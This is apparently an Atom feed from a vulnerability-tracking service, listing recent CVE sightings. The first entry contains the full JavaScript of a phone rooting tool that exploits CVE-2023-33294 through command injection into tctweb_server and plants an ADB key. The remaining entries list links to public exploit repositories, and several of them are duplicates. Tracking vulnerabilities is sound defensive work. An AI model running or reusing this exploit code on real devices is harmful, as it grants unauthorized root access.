<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://vulnerability.circl.lu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-09-17T18:21:52.497051+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@circl.lu</email>
  </author>
  <link href="https://vulnerability.circl.lu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent sightings.</subtitle>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/3285ccb3-681e-4719-8a26-73ad19c972c9/export</id>
    <title>3285ccb3-681e-4719-8a26-73ad19c972c9</title>
    <updated>2026-09-17T18:21:52.515653+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cvepremium.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "3285ccb3-681e-4719-8a26-73ad19c972c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33294", "type": "seen", "source": "https://gist.github.com/yissr/8edf9939a0dd771edb6bac5284f554b4", "content": "T435SP Root\n\n\n*{margin:0;padding:0;box-sizing:border-box}\nbody{font-family:monospace;font-size:14px;background:#111;color:#0f0;padding:8px}\nh1{font-size:16px;margin-bottom:8px}\n#log{white-space:pre-wrap;word-break:break-all;line-height:1.4}\n.err{color:#f44}.ok{color:#0f0}.info{color:#ff0}.cmd{color:#0af}\nbutton{background:#333;color:#0f0;border:1px solid #0f0;padding:6px 12px;margin:4px;font-family:monospace;font-size:14px}\n\n\nT435SP CVE-2023-33294\n\n\n\n1. TEST\n2. ROOT\n3. CHECK\n\nvar BASE = 'http://127.0.0.1:2929';\nvar ADB_KEY = 'QAAAABt2QW7tix+PJkW3MYipj3ITEtXtfJwPg8oYqR1EVEJYEitYGxT62VAktCTY8+bgqQpSb0V3qQuBk/UZZwrTxg397HWvSyvyUq/5gei9K6JI07QZE0ANgbSnB3/VdIT9fqi7BzgGuK5t+jK40IwKlmmfOeeL2wnABEbwBElbCYYRTPDnW7OvoovJ71L3z/JlhF6DDy70Dc6Hop0wHfD/elyp01ltcyC60mOTZj7m+SAGbb0PUbfdIiLdNyrp4N8r9Wlswl7b1UHvn7iCt8IKWNf6TtOCKJ9WqkkBqnaA4+yqHYyGqZkHTXmOi0AGrLr6yZmq6l7hspl3JvGzV1rF+WEoBTq4YcJ9KFf/2reaImZP5S9U8Y7i2lliAeyeF8dPXSaa+viYfehKj9mu6IzivjzBouEjD9xDLPoFUGNA9lI0FPMv9kZQy8gwEx8Zu+05oKQXNjNoU7sho+jirla8oCSmZSnniuFuCw9vquNIs9RJp9JiVo7J+cdE290c4Z6s0ygN65ddnQU7U9MMJVhF/92A7GYBylN9f0JIM+n6od3Eepb2TG1AvnLs94vT8UUxA76Md/TTYl9JWfIyAYGXWR6qkEfGrTnguK9sGncJFMxzftiXB2h7EpOh0WJUppEZ4QejGAQztjrhUDwtdp+xhttHRehtNh7uCTxJMvCQyUmoHlPsHwEAAQA= YK@DESKTOP-79K8P3I';\n\nfunction log(msg, cls) {\n  var el = document.getElementById('log');\n  var span = document.createElement('span');\n  span.className = cls || '';\n  span.textContent = msg + '\\n';\n  el.appendChild(span);\n  window.scrollTo(0, document.body.scrollHeight);\n}\n\nfunction tctweb(params) {\n  return fetch(BASE, {\n    method: 'POST',\n    headers: {'Content-Type': 'application/x-www-form-urlencoded'},\n    body: params\n  }).then(function(r) { return r.text(); });\n}\n\nfunction shell(cmd) {\n  log('$ ' + cmd, 'cmd');\n  return tctweb('cmd=bash&amp;amp;cmdshell=' + encodeURIComponent(cmd))\n    .then(function(r) { log(r.trim()); return r.trim(); })\n    .catch(function(e) { log('ERROR: ' + e, 'err'); return ''; });\n}\n\nfunction readfile(path) {\n  return tctweb('cmd=bash&amp;amp;cmdshell=readfile&amp;amp;filename=' + encodeURIComponent(path));\n}\n\nfunction writefile(path, content) {\n  return tctweb('cmd=bash&amp;amp;cmdshell=writefile&amp;amp;filename=' + encodeURIComponent(path) + '&amp;amp;filecontent=' + encodeURIComponent(content));\n}\n\nfunction runTest() {\n  log('=== TESTING tctweb_server ===', 'info');\n  log('Connecting to ' + BASE + '...', 'info');\n\n  // Simple GET test first\n  fetch(BASE)\n    .then(function(r) { return r.text(); })\n    .then(function(t) {\n      log('SERVER IS ALIVE!', 'ok');\n      log('Response: ' + t.substring(0, 200), 'info');\n      // Now test command execution\n      return readfile('/system/build.prop');\n    })\n    .then(function(t) {\n      if (t) {\n        log('=== build.prop ===', 'info');\n        log(t.substring(0, 500));\n        // Extract key props\n        var lines = t.split('\\n');\n        for (var i = 0; i &amp;lt; lines.length; i++) {\n          var l = lines[i];\n          if (l.indexOf('ro.build.display') &amp;gt;= 0 ||\n              l.indexOf('ro.kaios') &amp;gt;= 0 ||\n              l.indexOf('ro.debuggable') &amp;gt;= 0 ||\n              l.indexOf('ro.adb.secure') &amp;gt;= 0 ||\n              l.indexOf('ro.secure') &amp;gt;= 0 ||\n              l.indexOf('ro.build.type') &amp;gt;= 0) {\n            log('&amp;gt;&amp;gt;&amp;gt; ' + l, 'ok');\n          }\n        }\n      }\n      return shell('id');\n    })\n    .then(function(t) {\n      if (t.indexOf('root') &amp;gt;= 0) {\n        log('*** RUNNING AS ROOT! ***', 'ok');\n      } else {\n        log('Not root: ' + t, 'err');\n      }\n      log('=== TEST COMPLETE ===', 'info');\n    })\n    .catch(function(e) {\n      log('FAILED: ' + e, 'err');\n      log('tctweb_server is NOT running or not accessible.', 'err');\n      log('This phone may be KaiOS 3.1+ (patched).', 'info');\n    });\n}\n\nfunction runExploit() {\n  log('=== ROOTING PHONE ===', 'info');\n\n  // Step 1: Check we have root\n  shell('id')\n    .then(function(t) {\n      if (t.indexOf('root') &amp;lt; 0) {\n        log('NOT ROOT - aborting', 'err');\n        return Promise.reject('not root');\n      }\n      log('Confirmed root access', 'ok');\n\n      // Step 2: Create adb_keys directory if needed\n      return shell('mkdir -p /data/misc/adb &amp;amp;&amp;amp; chmod 750 /data/misc/adb &amp;amp;&amp;amp; chown system:shell /data/misc/adb');\n    })\n    .then(function() {\n      log('Created /data/misc/adb/', 'ok');\n\n      // Step 3: Write ADB public key\n      return shell('echo \"' + ADB_KEY + '\" &amp;gt; /data/misc/adb/adb_keys &amp;amp;&amp;amp; chmod 640 /data/misc/adb/adb_keys &amp;amp;&amp;amp; chown system:shell /data/misc/adb/adb_keys');\n    })\n    .then(function() {\n      log('Wrote adb_keys', 'ok');\n\n      // Step 4: Verify\n      return shell('cat /data/misc/adb/adb_keys | head -c 60');\n    })\n    .then(function(t) {\n      if (t.indexOf('QAAAA') &amp;gt;= 0) {\n        log('ADB key verified!', 'ok');\n      } else {\n        log('Key verification unclear: ' + t, 'err');\n      }\n\n      // Step 5: Set properties for developer mode\n      return shell('setprop persist.sys.usb.config diag,serial_cdev,rmnet,adb');\n    })\n    .then(function() {\n      log('Set USB config property', 'ok');\n      return shell('setprop ro.debuggable 1');\n    })\n    .then(function() {\n      // ro.debuggable is read-only, but try anyway\n      return shell('setprop persist.service.adb.enable 1');\n    })\n    .then(function() {\n      log('Set ADB enable property', 'ok');\n\n      // Step 6: Restart adbd to pick up new keys\n      return shell('stop adbd &amp;amp;&amp;amp; start adbd');\n    })\n    .then(function() {\n      log('Restarted adbd', 'ok');\n\n      // Step 7: Enable developer menu (KaiOS)\n      return shell('getprop ro.build.type');\n    })\n    .then(function(buildType) {\n      log('Build type: ' + buildType, 'info');\n\n      // Try to find and modify the settings DB\n      return shell('find /data/local -name \"*.sqlite\" -o -name \"settings*\" 2&amp;gt;/dev/null | head -20');\n    })\n    .then(function(t) {\n      log('Settings files: ' + t, 'info');\n\n      log('', '');\n      log('=== DONE ===', 'ok');\n      log('ADB key injected. Try connecting ADB from PC now.', 'ok');\n      log('If still unauthorized, reboot phone and retry ADB.', 'info');\n    })\n    .catch(function(e) {\n      log('EXPLOIT FAILED: ' + e, 'err');\n    });\n}\n\nfunction runCheck() {\n  log('=== POST-EXPLOIT CHECK ===', 'info');\n\n  shell('cat /data/misc/adb/adb_keys 2&amp;gt;/dev/null | wc -c')\n    .then(function(t) {\n      var bytes = parseInt(t);\n      log('adb_keys size: ' + bytes + ' bytes', bytes &amp;gt; 0 ? 'ok' : 'err');\n      return shell('getprop ro.adb.secure');\n    })\n    .then(function(t) {\n      log('ro.adb.secure = ' + t, t === '0' ? 'ok' : 'info');\n      return shell('getprop ro.debuggable');\n    })\n    .then(function(t) {\n      log('ro.debuggable = ' + t, t === '1' ? 'ok' : 'info');\n      return shell('getprop persist.sys.usb.config');\n    })\n    .then(function(t) {\n      log('usb.config = ' + t, 'info');\n      return shell('getprop sys.usb.state');\n    })\n    .then(function(t) {\n      log('usb.state = ' + t, 'info');\n      return shell('ps | grep adbd');\n    })\n    .then(function(t) {\n      log('adbd process: ' + t, t ? 'ok' : 'err');\n      return shell('ls -la /data/misc/adb/');\n    })\n    .then(function(t) {\n      log('adb dir: ' + t, 'info');\n      log('=== CHECK COMPLETE ===', 'info');\n    });\n}\n\nlog('TCL T435SP Root Tool', 'info');\nlog('CVE-2023-33294: tctweb_server RCE', 'info');\nlog('', '');\nlog('Press 1/TEST to check if vulnerable', 'info');\nlog('Press 2/ROOT to inject ADB key', 'info');\nlog('Press 3/CHECK to verify exploit', 'info');\n\n", "creation_timestamp": "2026-09-16T15:26:53.580441Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/3285ccb3-681e-4719-8a26-73ad19c972c9/export"/>
    <published>2026-09-16T15:26:53.580441+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/e037a319-b60b-42b1-8ffe-8c1ad2cd02d8/export</id>
    <title>e037a319-b60b-42b1-8ffe-8c1ad2cd02d8</title>
    <updated>2026-09-17T18:21:52.518432+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cvepremium.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "e037a319-b60b-42b1-8ffe-8c1ad2cd02d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33160", "type": "published-proof-of-concept", "source": "https://t.me/cissp/7133", "content": "exploit\n1. CVE-2023-36874:\nWindows Error Reporting Service Privilege Enhancement Vulnerability\nhttps://github.com/c4m3l-security/CVE-2023-36874\n2. CVE-2023-34127:\nImproper Neutralization of Special Elements used in an OS Command (\"OS Command Injection\") vulnerability in SonicWall GMS, SonicWall Analytics\nhttps://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis\n\nexploit\n1. CVE-2023-33160:\nMS SharePoint Server RCE\nhttps://github.com/hipnesspatten/CVE-2023-33160\n2. CVE-2023-33157:\nMS SharePoint Server 2016/2019/Subscription Edition Privilege Escalation\nhttps://github.com/hipnesspatten/CVE-2023-33157\n\n\n-Cyber Security awareness-\n\nUp2date 4 Defence Today,\nSecure Tomorrow\n@CisoasaService\n1402.06.01", "creation_timestamp": "2026-09-10T00:00:12.322228Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/e037a319-b60b-42b1-8ffe-8c1ad2cd02d8/export"/>
    <published>2026-09-10T00:00:12.322228+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/83e22808-52e2-44ed-8178-dc41a01039c2/export</id>
    <title>83e22808-52e2-44ed-8178-dc41a01039c2</title>
    <updated>2026-09-17T18:21:52.518591+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cvepremium.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "83e22808-52e2-44ed-8178-dc41a01039c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33157", "type": "published-proof-of-concept", "source": "https://t.me/cissp/7133", "content": "exploit\n1. CVE-2023-36874:\nWindows Error Reporting Service Privilege Enhancement Vulnerability\nhttps://github.com/c4m3l-security/CVE-2023-36874\n2. CVE-2023-34127:\nImproper Neutralization of Special Elements used in an OS Command (\"OS Command Injection\") vulnerability in SonicWall GMS, SonicWall Analytics\nhttps://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis\n\nexploit\n1. CVE-2023-33160:\nMS SharePoint Server RCE\nhttps://github.com/hipnesspatten/CVE-2023-33160\n2. CVE-2023-33157:\nMS SharePoint Server 2016/2019/Subscription Edition Privilege Escalation\nhttps://github.com/hipnesspatten/CVE-2023-33157\n\n\n-Cyber Security awareness-\n\nUp2date 4 Defence Today,\nSecure Tomorrow\n@CisoasaService\n1402.06.01", "creation_timestamp": "2026-09-10T00:00:12.222281Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/83e22808-52e2-44ed-8178-dc41a01039c2/export"/>
    <published>2026-09-10T00:00:12.222281+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/8f10c276-0fef-4046-9344-6f7260923d2f/export</id>
    <title>8f10c276-0fef-4046-9344-6f7260923d2f</title>
    <updated>2026-09-17T18:21:52.518704+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cvepremium.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "8f10c276-0fef-4046-9344-6f7260923d2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33145", "type": "published-proof-of-concept", "source": "https://t.me/cissp/7043", "content": "exploit\nWindows 11 Exploits\n(CVE-2023-24892, CVE-2023-33131, CVE-2022-30129, CVE-2023-33137, CVE-2023-33145, CVE-2023-33148, ...)\nhttps://github.com/nu11secur1ty/Windows11Exploits\n\ntools\nRed Team Tactics\nADHunt v2.0 - tool for exploiting Active Directory Enviroments\nhttps://github.com/Auto19/ADHunt\n\n\n-Cyber Security awareness-\n\nUp2date 4 Defence Today,\nSecure Tomorrow\n@CisoasaService\n1402.04.30", "creation_timestamp": "2026-09-10T00:00:10.907566Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/8f10c276-0fef-4046-9344-6f7260923d2f/export"/>
    <published>2026-09-10T00:00:10.907566+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/9710f994-52a7-49e6-8a25-5c3077b1c904/export</id>
    <title>9710f994-52a7-49e6-8a25-5c3077b1c904</title>
    <updated>2026-09-17T18:21:52.518807+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cvepremium.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "9710f994-52a7-49e6-8a25-5c3077b1c904", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33137", "type": "published-proof-of-concept", "source": "https://t.me/cissp/7043", "content": "exploit\nWindows 11 Exploits\n(CVE-2023-24892, CVE-2023-33131, CVE-2022-30129, CVE-2023-33137, CVE-2023-33145, CVE-2023-33148, ...)\nhttps://github.com/nu11secur1ty/Windows11Exploits\n\ntools\nRed Team Tactics\nADHunt v2.0 - tool for exploiting Active Directory Enviroments\nhttps://github.com/Auto19/ADHunt\n\n\n-Cyber Security awareness-\n\nUp2date 4 Defence Today,\nSecure Tomorrow\n@CisoasaService\n1402.04.30", "creation_timestamp": "2026-09-10T00:00:10.819282Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/9710f994-52a7-49e6-8a25-5c3077b1c904/export"/>
    <published>2026-09-10T00:00:10.819282+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/1b005bc6-f2fb-4a03-a5f0-b4e2edf97dcf/export</id>
    <title>1b005bc6-f2fb-4a03-a5f0-b4e2edf97dcf</title>
    <updated>2026-09-17T18:21:52.518937+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cvepremium.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "1b005bc6-f2fb-4a03-a5f0-b4e2edf97dcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33148", "type": "published-proof-of-concept", "source": "https://t.me/cissp/7043", "content": "exploit\nWindows 11 Exploits\n(CVE-2023-24892, CVE-2023-33131, CVE-2022-30129, CVE-2023-33137, CVE-2023-33145, CVE-2023-33148, ...)\nhttps://github.com/nu11secur1ty/Windows11Exploits\n\ntools\nRed Team Tactics\nADHunt v2.0 - tool for exploiting Active Directory Enviroments\nhttps://github.com/Auto19/ADHunt\n\n\n-Cyber Security awareness-\n\nUp2date 4 Defence Today,\nSecure Tomorrow\n@CisoasaService\n1402.04.30", "creation_timestamp": "2026-09-10T00:00:10.768710Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/1b005bc6-f2fb-4a03-a5f0-b4e2edf97dcf/export"/>
    <published>2026-09-10T00:00:10.768710+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/6fcb7b2d-01e6-4d07-a0fc-7821ee3be953/export</id>
    <title>6fcb7b2d-01e6-4d07-a0fc-7821ee3be953</title>
    <updated>2026-09-17T18:21:52.519046+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cvepremium.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "6fcb7b2d-01e6-4d07-a0fc-7821ee3be953", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33131", "type": "published-proof-of-concept", "source": "https://t.me/cissp/7043", "content": "exploit\nWindows 11 Exploits\n(CVE-2023-24892, CVE-2023-33131, CVE-2022-30129, CVE-2023-33137, CVE-2023-33145, CVE-2023-33148, ...)\nhttps://github.com/nu11secur1ty/Windows11Exploits\n\ntools\nRed Team Tactics\nADHunt v2.0 - tool for exploiting Active Directory Enviroments\nhttps://github.com/Auto19/ADHunt\n\n\n-Cyber Security awareness-\n\nUp2date 4 Defence Today,\nSecure Tomorrow\n@CisoasaService\n1402.04.30", "creation_timestamp": "2026-09-10T00:00:10.721099Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/6fcb7b2d-01e6-4d07-a0fc-7821ee3be953/export"/>
    <published>2026-09-10T00:00:10.721099+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/d6d47a3d-593d-4dba-8b10-7db8fcb31c29/export</id>
    <title>d6d47a3d-593d-4dba-8b10-7db8fcb31c29</title>
    <updated>2026-09-17T18:21:52.519166+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cvepremium.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "d6d47a3d-593d-4dba-8b10-7db8fcb31c29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-3338", "type": "published-proof-of-concept", "source": "https://t.me/cissp/6989", "content": "exploit\n1. CVE-2023-20864:\nRCE in VMware Aria Operations for Logs\nhttps://www.zerodayinitiative.com/blog/2023/6/29/cve-2023-20864-remote-code-execution-in-vmware-aria-operations-for-logs\n\n2. CVE-2023-3338:\nLinux kernel LPE\nhttps://github.com/TurtleARM/CVE-2023-3338\n\n3. Netskope Client Service LPE\nhttps://hdwsec.fr/blog/20230622-netskope\n\n4.Linux-based vulnerabilities (CVE) exploit detection through runtime security using Falco/Osquery/Yara/Rego/Sigma\nhttps://github.com/Loginsoft-Research/Linux-Exploit-Detection\n\n\n-Cyber Security awareness-\n\nUp2date 4 Defence Today,\nSecure Tomorrow\n@CisoasaService\n1402.04.11", "creation_timestamp": "2026-09-10T00:00:10.045090Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/d6d47a3d-593d-4dba-8b10-7db8fcb31c29/export"/>
    <published>2026-09-10T00:00:10.045090+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/b2685239-65dd-445c-b940-eba9f0229775/export</id>
    <title>b2685239-65dd-445c-b940-eba9f0229775</title>
    <updated>2026-09-17T18:21:52.519271+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cvepremium.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "b2685239-65dd-445c-b940-eba9f0229775", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33299", "type": "seen", "source": "https://t.me/cissp/6974", "content": "\u26a1\ufe0f Urgent security alert! Fortinet has released urgent updates to fix a critical vulnerability (CVE-2023-33299) in FortiNAC, exposing networks to arbitrary code execution.  \nLearn more: https://thehackernews.com/2023/06/new-fortinets-fortinac-vulnerability.html\n\nCritical SQL injection vulnerabilities found in Gentoo Soko! Exploiting these flaws could lead to remote code execution (RCE) on affected systems. \nDiscover the details: https://thehackernews.com/2023/06/critical-sql-injection-flaws-expose.html\n\n\n-Cyber Security awareness-\n\nUp2date 4 Defence Today,\nSecure Tomorrow\n@CisoasaService\n1402.04.08", "creation_timestamp": "2026-09-10T00:00:09.906373Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/b2685239-65dd-445c-b940-eba9f0229775/export"/>
    <published>2026-09-10T00:00:09.906373+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/eb1f4da9-d10d-40af-bb2c-6c598c55680e/export</id>
    <title>eb1f4da9-d10d-40af-bb2c-6c598c55680e</title>
    <updated>2026-09-17T18:21:52.519370+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cvepremium.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "eb1f4da9-d10d-40af-bb2c-6c598c55680e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-3338", "type": "published-proof-of-concept", "source": "https://t.me/cissp/6989", "content": "exploit\n1. CVE-2023-20864:\nRCE in VMware Aria Operations for Logs\nhttps://www.zerodayinitiative.com/blog/2023/6/29/cve-2023-20864-remote-code-execution-in-vmware-aria-operations-for-logs\n\n2. CVE-2023-3338:\nLinux kernel LPE\nhttps://github.com/TurtleARM/CVE-2023-3338\n\n3. Netskope Client Service LPE\nhttps://hdwsec.fr/blog/20230622-netskope\n\n4.Linux-based vulnerabilities (CVE) exploit detection through runtime security using Falco/Osquery/Yara/Rego/Sigma\nhttps://github.com/Loginsoft-Research/Linux-Exploit-Detection\n\n\n-Cyber Security awareness-\n\nUp2date 4 Defence Today,\nSecure Tomorrow\n@CisoasaService\n1402.04.11", "creation_timestamp": "2026-09-09T23:00:05.689567Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/eb1f4da9-d10d-40af-bb2c-6c598c55680e/export"/>
    <published>2026-09-09T23:00:05.689567+00:00</published>
  </entry>
</feed>
